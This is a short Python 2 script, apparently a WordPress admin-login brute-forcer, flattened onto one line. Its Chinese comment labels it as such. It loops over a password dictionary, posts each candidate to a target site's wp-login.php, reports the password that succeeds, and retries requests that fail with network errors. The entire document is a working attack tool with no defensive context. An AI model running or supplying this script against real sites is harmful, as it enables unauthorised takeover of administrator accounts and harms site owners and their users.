#!/usr/bin/env python #Coding = UTF-8 #wordpress后台暴力破解(python) #python wordpress_bruteforce.py https://xxxx.com/wp-login.php xxxx dic.txt import urllib, time, sys start = time.time() errors = [] def exploit(url, name, dictionary): for line in open(dictionary): lineline = line.strip() try: data = urllib.urlencode({'log':name,'pwd':line,'redirect_to':''}) content = urllib.urlopen(url, data) if content.read() == '': print "Password is : %s" % line print time.time() - start sys.exit() else: print "try %s failed" % line except IOError: errors.append(line) print "try %s occurs IOERROR, add to list and retry it later" % line if __name__ == "__main__": if len(sys.argv) < 4: print 'Usage: Url AdminName Dictionary' sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3]) while errors: for i,line in enumerate(errors): try: data = urllib.urlencode({'log':sys.argv[2],'pwd':line,'redirect_to':''}) content = urllib.urlopen(sys.argv[1], data) if content.read() == '': print "Password is : %s" % line print time.time() - start sys.exit() else: print "try %s failed" % line del errors[i] except IOError: errors.append(line) print "try %s occurs IOERROR, add to list and retry it later" % line print time.time() - start